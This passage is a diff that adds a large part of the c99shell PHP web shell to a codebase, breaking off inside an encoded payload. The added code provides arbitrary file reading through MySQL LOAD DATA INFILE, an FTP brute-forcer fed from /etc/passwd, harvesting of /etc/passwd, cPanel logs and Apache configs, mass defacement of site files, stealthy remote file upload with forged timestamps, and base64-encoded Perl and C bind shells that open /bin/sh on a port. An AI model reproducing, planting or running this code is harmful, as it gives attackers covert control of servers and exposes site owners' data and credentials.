+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}}
+  echo "
";
+ }
+ echo "
 i 
  • If login is null, login is owner of process.
  • If host is null, host is localhost
  • If port is null, port is 3306 (default)
    •  Please, fill the form:
    UsernamePassword 
    HOSTPORT
    		">Home
    ".htmlspecialchars($sql_db)." ]---
    ";
+    $c = 0;
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo "» ".htmlspecialchars($row[0])." (".$count_row[0].")
    
+"; mysql_free_result($count); $c++;}
+    if (!$c) {echo "No tables found in database.";}
+   }
+  }
+  else
+  {
+   ?>    		Home
    Please, select database
    		";
+  //Start center panel
+  if ($sql_db)
+  {
+   echo "
    There are ".$c." tables in this DB (".htmlspecialchars($sql_db).").
    ";
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}}
+   echo "
    ";
+
+   $acts = array("","dump");
+
+   if ($sql_act == "query")
+   {
+    echo "
    ";
+    if ($submit)
+    {
+     if ((!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error: 
    ".$sql_query_error."
    ";}
+    }
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+    if ((!$submit) or ($sql_act)) {echo "
    "; if (($sql_query) and (!$submit)) {echo "Do you really want to  :";} else {echo "SQL-Query :";} echo "



     
    ";}
+   }
+   if (in_array($sql_act,$acts))
+   {
+    ?>
    Create new table:
     
    		SQL-Dump DB:
    "> 
    ";}
+    if ($sql_act == "newtpl")
+    {
+     echo "";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    ";
+    }
+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason: ".mysql_error();}
+   }
+   elseif ($sql_act == "dump")
+   {
+    $set = array();
+    $set["sock"] = $sql_sock;
+    $set["db"] = $sql_db;
+    $dump_out = "print";               
+    if ($dump_out == "print") {$set["print"] = 1; $set["nl2br"] = 1;}
+    elseif ($dump_out == "download")
+    {
+     @ob_clean();
+     header("Content-type: c99shell");
+     header("Content-disposition: attachment; filename=\"".$f."\";"); 
+     $set["print"] = 1;
+     $set["nl2br"] = 1;
+    }
+    $set["file"] = $dump_file;
+    $set["add_drop"] = true;
+    $ret = mysql_dump($set);
+    if ($dump_out == "download") {exit;}
+   }
+   else
+   {
+    $result = mysql_query("SHOW TABLE STATUS", $sql_sock) or print(mysql_error()); 
+    echo "
    ";
+    echo "";
+    echo "";
+    echo "";
+    echo "";
+    echo "";
+    echo "";
+    echo "";
+    echo "";
+    echo "";
+    echo "";
+    $i = 0;
+    $tsize = $trows = 0;
+    while ($row = mysql_fetch_array($result, MYSQL_NUM))
+    {
+     $tsize += $row["5"];
+     $trows += $row["5"];
+     $size = view_size($row["5"]);
+     echo "";
+     echo "";
+     echo "";
+     echo "";
+     echo "";
+     echo "";
+     echo "";
+     echo "";
+     echo "";
+     echo "";
+     $i++;
+    }
+    echo "";
+    echo "";
+    echo "";
+    echo "";
+    echo "";
+    echo "";
+    echo "";
+    echo "";
+    echo "";
+    echo "";
+    echo "
    Table
    		RowsTypeCreatedModifiedSizeAction
     ".$row[0]." ".$row[3]."".$row[1]."".$row[10]."".$row[11]."".$size."
+ 
+
    »
    ".$i." table(s)
    		".$trows."".$row[1]."".$row[10]."".$row[11]."".view_size($tsize)."
     
    ";
+    mysql_free_result($result);
+   }
+  }
+  }
+  else
+  {
+   $acts = array("","newdb","serverstat","servervars","processes","getfile");
+   if (in_array($sql_act,$acts))
+   {
+    ?>
    Create new DB:
     
    		View File:
     
    ";
+    if ($sql_act == "newdb")
+    {
+     echo "";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    ";}
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason: ".mysql_error();}
+    }
+    if ($sql_act == "serverstatus")
+    {
+     $result = mysql_query("SHOW STATUS", $sql_sock); 
+     echo "
    Server-status variables:

    ";
+     echo "";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} 
+     echo "
    Namevalue
    ".$row[0]."".$row[1]."
    ";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "servervars")
+    {
+     $result = mysql_query("SHOW VARIABLES", $sql_sock); 
+     echo "
    Server variables:

    ";
+     echo "";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} 
+     echo "
    Namevalue
    ".$row[0]."".$row[1]."
    ";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "processes")
+    {
+     if (!empty($kill)) {$query = 'KILL ' . $kill . ';'; $result = mysql_query($query, $sql_sock); echo "Killing process #".$kill."... ok. he is dead, amen.";}
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock); 
+     echo "
    Processes:

    ";
+     echo "";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "";}
+     echo "
    IDUSERHOSTDBCOMMANDTIMESTATEINFOAction
    ".$row[0]."".$row[1]."".$row[2]."".$row[3]."".$row[4]."".$row[5]."".$row[6]."".$row[7]."Kill
    ";
+     mysql_free_result($result);
+    }
+    elseif (($sql_act == "getfile"))
+    {
+     if (!mysql_create_db("tmp_bd")) {echo mysql_error();}
+     elseif (!mysql_select_db("tmp_bd")) {echo mysql_error();}
+     elseif (!mysql_query('CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );')) {echo mysql_error();}
+     else {mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); $query = "SELECT * FROM tmp_file"; $result = mysql_query($query); if (!$result) {echo "Error in query \"".$query."\": ".mysql_error();}
+     else
+     {
+      for ($i=0;$i$col_value) {$f .= $col_value;}}
+      if (empty($f)) {echo "File \"".$sql_getfile."\" does not exists or empty!";}
+      else {echo "File \"".$sql_getfile."\":
    ".nl2br(htmlspecialchars($f));}
+     }
+     mysql_free_result($result);
+     if (!mysql_drop_db("tmp_bd")) {echo ("Can't drop tempory DB \"tmp_bd\"!");}
+     }
+    }
+   }
+  }
+ }
+ echo "
    ";
+}
+if ($act == "mkdir")
+{
+ if ($mkdir != $d) {if (file_exists($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": object alredy exists";} elseif (!mkdir($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": access denied";}}
+ echo "

    ";
+ $act = $dspact = "ls";
+}
+if ($act == "ftpquickbrute")
+{
+ echo "Ftp Quick brute:
    ";
+ if ($win) {echo "This functions not work in Windows!

    ";}
+ else
+ {
+  function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
+  {
+   if ($fqb_onlywithsh)
+   {
+    if (!in_array($sh,array("/bin/bash","/bin/sh","/usr/local/cpanel/bin/jailshell"))) {$true = false;}
+    else {$true = true;}
+   }
+   else {$true = true;}
+   if ($true)
+   {
+    $sock = @ftp_connect($host,$port,$timeout);
+    if (@ftp_login($sock,$login,$pass))
+    {
+     echo "Connected to ".$host." with login \"".$login."\" and password \"".$pass."\".
    ";
+     ob_flush();
+     return true;
+    }
+   }
+  }
+  if (!empty($submit))
+  {
+   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+   $fp = fopen("/etc/passwd","r");
+   if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+   else
+   {
+    ob_flush();
+    $i = $success = 0;
+    $ftpquick_st = getmicrotime();
+    while(!feof($fp))
+    { 
+     $str = explode(":",fgets($fp,2048));
+     if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
+     {
+      $success++;
+     }
+     if ($i > $fqb_lenght) {break;}
+     $i++;
+    } 
+    if ($success == 0) {echo "No success. connections!";}
+    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+    echo "
    Done!
    Total time (secs.): ".$ftpquick_t."
    Total connections: ".$i."
    Success.: ".$success."
    Unsuccess.:".($i-$success)."
    Connects per second: ".round($i/$ftpquick_t,2)."
    ";
+   }
+  }
+  else {echo "

    Read first: 

    Users only with shell? 

    ";}
+ }
+}
+if ($act == "lsa")
+{
+ echo "
    Server security information:
    ";
+ echo "Software: ".PHP_OS.", ".$SERVER_SOFTWARE."
    ";
+ echo "Safe-Mode: ".$hsafemode."
    ";
+ echo "Open base dir: ".$hopenbasedir."
    ";
+ if (!$win)
+ {
+  if ($nixpasswd)
+  {
+   if ($nixpasswd == 1) {$nixpasswd = 0;}
+   $num = $nixpasswd + $nixpwdperpage;
+   echo "*nix /etc/passwd:
    ";
+   $i = $nixpasswd;
+   while ($i < $num)
+   {
+    $uid = posix_getpwuid($i);
+    if ($uid) {echo join(":",$uid)."
    ";}
+    $i++;
+   }
+  }
+  else {echo "
    Get /etc/passwd
    ";}
+  if (file_get_contents("/etc/userdomains")) {echo "View cpanel user-domains logs
    ";}
+  if (file_get_contents("/var/cpanel/accounting.log")) {echo "View cpanel logs
    ";}
+  if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";}
+  if (file_get_contents("/etc/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";}
+ }
+ else
+ {
+  $v = $_SERVER["WINDIR"]."\repair\sam";
+  if (file_get_contents($v)) {echo "You can't crack winnt passwords(".$v.") 
    ";}
+  else {echo "You can crack winnt passwords. Download, and use lcp.crack+.
    ";}
+ }
+}
+if ($act == "mkfile")
+{
+ if ($mkfile != $d)
+ {
+  if (file_exists($mkfile)) {echo "Make File \"".htmlspecialchars($mkfile)."\": object alredy exists";}
+  elseif (!fopen($mkfile,"w")) {echo "Make File \"".htmlspecialchars($mkfile)."\": access denied";}
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} $f = basename($mkfile);}
+ }
+ else {$act = $dspact = "ls";}
+}
+if ($act == "fsbuff")
+{
+ $arr_copy = $sess_data["copy"];
+ $arr_cut = $sess_data["cut"];
+ $arr = array_merge($arr_copy,$arr_cut);
+ if (count($arr) == 0) {echo "
    Buffer is empty!
    ";}
+ else
+ {
+  echo "File-System buffer

    ";
+  $ls_arr = $arr;
+  $disp_fullpath = true;
+  $act = "ls";
+ }
+}
+if ($act == "selfremove")
+{
+ if (!empty($submit))
+ {
+  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; exit; }
+  else {echo "
    Can't delete ".__FILE__."!
    ";}
+ }
+ else
+ {
+  $v = array();
+  for($i=0;$i<8;$i++) {$v[] = "NO";}
+  $v[] = "YES";
+  shuffle($v);
+  $v = join("   ",$v);
+  echo "Self-remove: ".__FILE__." 
    Are you sure?
    ".$v."
    ";
+ }
+}
+if ($act == "massdeface")
+{
+ if (empty($deface_in)) {$deface_in = $d;}
+ if (empty($deface_name)) {$deface_name = "(.*)"; $deface_name_regexp = 1;}
+ if (empty($deface_text_wwo)) {$deface_text_regexp = 0;}
+
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+
+  $text = $deface_text;
+  $text_regexp = $deface_text_regexp;
+  if (empty($text)) {$text = " "; $text_regexp = 1;}
+
+  $a = array
+  (
+   "name"=>$deface_name, "name_regexp"=>$deface_name_regexp,
+   "text"=>$text, "text_regexp"=>$text_regxp,
+   "text_wwo"=>$deface_text_wwo,
+   "text_cs"=>$deface_text_cs,
+   "text_not"=>$deface_text_not
+  );
+  $defacetime = getmicrotime();
+  $in = array_unique(explode(";",$deface_in));
+  foreach($in as $v) {c99fsearch($v);}
+  $defacetime = round(getmicrotime()-$defacetime,4);
+  if (count($found) == 0) {echo "No files found!";}
+  else
+  {
+   $ls_arr = $found;
+   $disp_fullpath = true;
+   $act = $dspact = "ls";
+  }
+ }
+ else
+ {
+  if (empty($deface_preview)) {$deface_preview = 1;}
+  if (empty($deface_html)) {$deface_html = "

    Mass-defaced with c99shell v. ".$shver.", coded by tristram[CCTeaM].    ";}
+ }
+ echo "
    ";
+ if (!$submit) {echo "Attention! It's a very dangerous feature, you may lost your data.

    ";}
+ echo "
+Deface for (file/directory name):   - regexp
+
    Deface in (explode \";\"): 
+

    Search text:
    
+

     - regexp
+   - whole words only
+   - case sensitive
+   - find files NOT containing the text
+
     - PREVIEW AFFECTED FILES
+

    Html of deface:
    
+

    ";
+ if ($act == "ls") {echo "
    Deface took ".$defacetime." secs

    ";}
+}
+if ($act == "search")
+{
+ if (empty($search_in)) {$search_in = $d;}
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+  $a = array
+  (
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp,
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp,
+   "text_wwo"=>$search_text_wwo,
+   "text_cs"=>$search_text_cs,
+   "text_not"=>$search_text_not
+  );
+  $searchtime = getmicrotime();
+  $in = array_unique(explode(";",$search_in));
+  foreach($in as $v)
+  {
+   c99fsearch($v);
+  }
+  $searchtime = round(getmicrotime()-$searchtime,4);
+  if (count($found) == 0) {echo "No files found!";}
+  else
+  {
+   $ls_arr = $found;
+   $disp_fullpath = true;
+   $act = $dspact = "ls";
+  }
+ }
+ echo "
    
+
+Search for (file/directory name):   - regexp
+
    Search in (explode \";\"): 
+

    Text:
    
+

     - regexp
+   - whole words only
+   - case sensitive
+   - find files NOT containing the text
+

    ";
+ if ($act == "ls") {echo "
    Search took ".$searchtime." secs

    ";}
+}
+if ($act == "chmod")
+{
+ $perms = fileperms($d.$f);
+ if (!$perms) {echo "Can't get current mode.";}
+ elseif ($submit)
+ {
+  if (!isset($owner[0])) {$owner[0] = 0;}
+  if (!isset($owner[1])) {$owner[1] = 0; }
+  if (!isset($owner[2])) {$owner[2] = 0;}
+  if (!isset($group[0])) {$group[0] = 0;}
+  if (!isset($group[1])) {$group[1] = 0;}
+  if (!isset($group[2])) {$group[2] = 0;}
+  if (!isset($world[0])) {$world[0] = 0;}
+  if (!isset($world[1])) {$world[1] = 0;}
+  if (!isset($world[2])) {$world[2] = 0;}
+  $sum_owner = $owner[0] + $owner[1] + $owner[2];
+  $sum_group = $group[0] + $group[1] + $group[2];
+  $sum_world = $world[0] + $world[1] + $world[2];
+  $sum_chmod = "0".$sum_owner.$sum_group.$sum_world;
+  $ret = @chmod($d.$f, $sum_chmod);
+  if ($ret) {$act = "ls";}
+  else {echo "Changing file-mode (".$d.$f."): error
    ";}
+ }
+ else
+ {
+  echo "Changing file-mode
    ";
+  $perms = view_perms(fileperms($d.$f));
+  $length = strlen($perms);
+  $owner_r = $owner_w = $owner_x =
+  $group_r = $group_w = $group_x = 
+  $world_r = $world_w = $group_x = "";
+
+  if ($perms[1] == "r") {$owner_r = " checked";} if ($perms[2] == "w") {$owner_w = " checked";}
+  if ($perms[3] == "x") {$owner_x = " checked";} if ($perms[4] == "r") {$group_r = " checked";}
+  if ($perms[5] == "w") {$group_w = " checked";} if ($perms[6] == "x") {$group_x = " checked";}
+  if ($perms[7] == "r") {$world_r = " checked";} if ($perms[8] == "w") {$world_w = " checked";}
+												 if ($perms[9] == "x") {$world_x = " checked";}
+  echo "
    
+
+
+
    
+
+
    Owner

    
+Read
    Write
    
+Execute    		Group

    
+Read
    
+Write
    
+Execute    		World

    Read
    
+Write
    
+Execute
    ";
+ }
+}
+if ($act == "upload")
+{
+ $uploadmess = "";
+ $uploadpath = str_replace("\\","/",$uploadpath);
+ if (empty($uploadpath)) {$uploadpath = $d;}
+ elseif (substr($uploadpath,strlen($uploadpath)-1,1) != "/") {$uploadpath .= "/";}
+ if (!empty($submit))
+ {
+  global $HTTP_POST_FILES;
+  $uploadfile = $HTTP_POST_FILES["uploadfile"];
+  if (!empty($uploadfile[tmp_name]))
+  {
+   if (empty($uploadfilename)) {$destin = $uploadfile[name];}
+   else {$destin = $userfilename;}
+   if (!move_uploaded_file($uploadfile[tmp_name],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile[name]." (can't copy \"".$uploadfile[tmp_name]."\" to \"".$uploadpath.$destin."\"!
    ";}
+  }
+  elseif (!empty($uploadurl))
+  {
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;}
+   else
+   {
+    $destin = explode("/",$destin);
+    $destin = $destin[count($destin)-1];
+    if (empty($destin))
+    {
+     $i = 0;
+     $b = "";
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
+   }
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "Incorect url!
    ";}
+   else
+   {
+    $st = getmicrotime();
+    $content = @file_get_contents($uploadurl);
+    $dt = round(getmicrotime()-$st,4);
+    if (!$content) {$uploadmess .=  "Can't download file!
    ";}
+    else
+    {
+     if ($filestealth) {$stat = stat($uploadpath.$destin);}
+     $fp = fopen($uploadpath.$destin,"w");
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!
    ";}
+     else
+     {
+      fwrite($fp,$content,strlen($content));
+      fclose($fp);
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
+     }
+    }
+   }
+  }
+ }
+ if ($miniform)
+ {
+  echo "".$uploadmess."";
+  $act = "ls";
+ }
+ else
+ {
+  echo "File upload:
    ".$uploadmess."
    
+Select file on your local computer: 
                   or
    
+Input URL: 

    
+Save this file dir: 

    
+File-name (auto-fill): 

    
+ convert file name to lovercase

    
+
+
    ";
+ }
+}
+if ($act == "delete")
+{
+ $delerr = "";
+ foreach ($actbox as $v)
+ {
+  $result = false;
+  $result = fs_rmobj($v);
+  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."
    ";}
+  if (!empty($delerr)) {echo "Deleting with errors:
    ".$delerr;}
+ }
+ $act = "ls";
+}
+if ($act == "deface")
+{
+ $deferr = "";
+ foreach ($actbox as $v)
+ {
+  $data = $deface_html;
+  if (eregi("%%%filedata%%%",$data)) {$data = str_replace("%%%filedata%%%",file_get_contents($v),$data);}
+  $data = str_replace("%%%filename%%%",basename($v),$data);
+  $data = str_replace("%%%filepath%%%",$v,$data);
+  $fp = @fopen($v,"w");
+  fwrite($fp,$data);
+  fclose($fp);
+  if (!$result) {$deferr .= "Can't deface ".htmlspecialchars($v)."
    ";}
+  if (!empty($delerr)) {echo "Defacing with errors:
    ".$deferr;}
+ }
+}
+if (!$usefsbuff)
+{
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "
    Sorry, buffer is disabled. For enable, set directive \"USEFSBUFF\" as TRUE.
    ";}
+}
+else
+{
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls";}
+ if ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
+ if ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} $ls_arr = array_merge($sess_data["copy"],$sess_data["cut"]); c99_sess_put($sess_data); $act = "ls";}
+ 
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "Pasting with errors:
    ".$psterr;}
+  $act = "ls";
+ }
+ elseif ($actarcbuff)
+ {
+  $arcerr = "";
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+  else {$ext = ".tar.gz";}
+  
+  if ($ext == ".tar.gz")
+  {
+   $cmdline = "tar cfzv";
+  }
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+  foreach($objects as $v)
+  {
+   $v = str_replace("\\","/",$v);
+   if (is_dir($v))
+   {
+    if (substr($v,strlen($v)-1,strlen($v)) != "/") {$v .= "/";}
+    $v .= "*";
+   }
+   $cmdline .= " ".$v;
+  }
+  $ret = `$cmdline`;
+  if (empty($ret)) {$arcerr .= "Can't call archivator!
    ";}
+  $ret = str_replace("\r\n","\n");
+  $ret = explode("\n",$ret);
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   if (in_array($v,$ret)) {fs_rmobj($v);}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($arcerr)) {echo "Archivation errors:
    ".$arcerr;}
+  $act = "ls";
+ }
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "Pasting with errors:
    ".$psterr;}
+  $act = "ls";
+ }
+}
+if ($act == "ls")
+{
+ if (count($ls_arr) > 0) {$list = $ls_arr;}
+ else
+ {
+  $list = array();
+  if ($h = @opendir($d))
+  {
+   while ($o = readdir($h)) {$list[] = $d.$o;}
+   closedir($h);
+  }
+ }
+ if (count($list) == 0) {echo "
    Can't open directory (".htmlspecialchars($d).")!
    ";}
+ else
+ {
+  //Building array
+  $tab = array();
+  $amount = count($ld)+count($lf);
+  $vd = "f"; //Viewing mode
+  if ($vd == "f")
+  {
+   $row = array();
+   $row[] = "Name";
+   $row[] = "Size";
+   $row[] = "Modify";
+   if (!$win)
+  {$row[] = "Owner/Group";}
+   $row[] = "Perms";
+   $row[] = "Action";
+   
+   $k = $sort[0];
+   if ((!is_numeric($k)) or ($k > count($row)-2)) {$k = 0;}
+   if (empty($sort[1])) {$sort[1] = "d";}
+   if ($sort[1] != "a")
+   {
+    $y = "";
+   }
+   else
+   {
+    $y = "";
+   }
+   
+   $row[$k] .= $y;
+   for($i=0;$i".$row[$i]."";}
+   }
+   
+   $tab = array();
+   $tab[cols] = array($row);
+   $tab[head] = array();
+   $tab[dirs] = array();
+   $tab[links] = array();
+   $tab[files] = array();
+
+   foreach ($list as $v)
+   {
+    $o = basename($v);
+    $dir = dirname($v);
+     
+    if ($disp_fullpath) {$disppath = $v;}
+    else {$disppath = $o;}
+    $disppath = str2mini($disppath,60);
+  
+    if (in_array($v,$sess_data["cut"])) {$disppath = "".$disppath."";}
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "".$disppath."";}
+
+    $uo = urlencode($o);
+    $ud = urlencode($dir);
+    $uv = urlencode($v);
+
+    $row = array();
+
+    if ($o == ".")
+    {
+     $row[] = " ".$o."";
+     $row[] = "LINK";
+    }
+    elseif ($o == "..")
+    {
+     $row[] = " ".$o."";
+     $row[] = "LINK";
+    }
+    elseif (is_dir($v))
+    {
+     if (is_link($v)) {$disppath .= " => ".readlink($v); $type = "LINK";}
+     else {$type = "DIR";}
+     $row[] =  " [".$disppath."]";
+     $row[] = $type;
+    }
+    elseif(is_file($v))
+    {
+     $ext = explode(".",$o);
+     $c = count($ext)-1;
+     $ext = $ext[$c];
+     $ext = strtolower($ext);
+     $row[] =  " ".$disppath."";
+     $row[] = view_size(filesize($v));
+    }
+    $row[] = date("d.m.Y H:i:s",filemtime($v));
+     
+    if (!$win)
+    {
+     $ow = @posix_getpwuid(fileowner($v));
+     $gr = @posix_getgrgid(filegroup($v));
+     $row[] = $ow["name"]."/".$gr["name"];
+    }
+         
+    if (is_writable($v)) {$row[] = "".view_perms(fileperms($v))."";}
+    else {$row[] = "".view_perms(fileperms($v))."";}
+
+    if (is_dir($v)) {$row[] = " ";}
+    else {$row[] = "   ";}
+
+    if (($o == ".") or ($o == "..")) {$tab[head][] = $row;}
+    elseif (is_link($v)) {$tab[links][] = $row;}
+    elseif (is_dir($v)) {$tab[dirs][] = $row;}
+    elseif (is_file($v)) {$tab[files][] = $row;}
+   }   
+  }
+  $v = $sort[0];
+  function tabsort($a, $b)
+  {
+   global $v;
+   return strnatcasecmp(strip_tags($a[$v]), strip_tags($b[$v]));
+  }
+  usort($tab[dirs], "tabsort");
+  usort($tab[files], "tabsort");
+  if ($sort[1] == "a")
+  {
+   $tab[dirs] = array_reverse($tab[dirs]);
+   $tab[files] = array_reverse($tab[files]);
+  }
+  //Compiling table
+  $table = array_merge($tab[cols],$tab[head],$tab[dirs],$tab[links],$tab[files]);
+  echo "
    Listing directory (".count($tab[files])." files and ".(count($tab[dirs])+count($tab[links]))." directories):

    ";
+  echo "";
+  foreach($table as $row)
+  {
+   echo "\r\n";
+   foreach($row as $v) {echo "\r\n";}
+   echo "\r\n";
+  }
+  echo "
    ".$v."
    ";
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
+  {
+   echo "                   ";
+  }
+  echo " 
    ";
+  echo "";
+ }
+}
+if ($act == "bind")
+{
+ $bndsrcs = array(
+"c99sh_bindport.pl"=>
+"IyEvdXNyL2Jpbi9wZXJsDQppZiAoQEFSR1YgPCAxKSB7ZXhpdCgxKTt9DQokcG9ydCA9ICRBUkdW".
+"WzBdOw0KZXhpdCBpZiBmb3JrOw0KJDAgPSAidXBkYXRlZGIiIC4gIiAiIHgxMDA7DQokU0lHe0NI".
+"TER9ID0gJ0lHTk9SRSc7DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsIFBGX0lORVQsIFNPQ0tfU1RS".
+"RUFNLCAwKTsNCnNldHNvY2tvcHQoUywgU09MX1NPQ0tFVCwgU09fUkVVU0VBRERSLCAxKTsNCmJp".
+"bmQoUywgc29ja2FkZHJfaW4oJHBvcnQsIElOQUREUl9BTlkpKTsNCmxpc3RlbihTLCA1MCk7DQph".
+"Y2NlcHQoWCxTKTsNCm9wZW4gU1RESU4sICI8JlgiOw0Kb3BlbiBTVERPVVQsICI+JlgiOw0Kb3Bl".
+"biBTVERFUlIsICI+JlgiOw0KZXhlYygiZWNobyBcIldlbGNvbWUgdG8gYzk5c2hlbGwhXHJcblxy".
+"XG5cIiIpOw0Kd2hpbGUoMSkNCnsNCiBhY2NlcHQoWCwgUyk7DQogdW5sZXNzKGZvcmspDQogew0K".
+"ICBvcGVuIFNURElOLCAiPCZYIjsNCiAgb3BlbiBTVERPVVQsICI+JlgiOw0KICBjbG9zZSBYOw0K".
+"ICBleGVjKCIvYmluL3NoIik7DQogfQ0KIGNsb3NlIFg7DQp9",
+
+"c99sh_bindport.c"=>
+"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5".
+"cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4N".
+"CiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50IGFyZ2M7DQpjaGFy".
+"ICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1".
+"Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5f".
+"ZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9pKGFyZ3ZbMV0p".
+"KTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tm".
+"ZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigi".
+"c29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikmcmVtb3Rl".
+"LCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1h".
+"Y2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsN".
+"CiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk7DQogICBy".
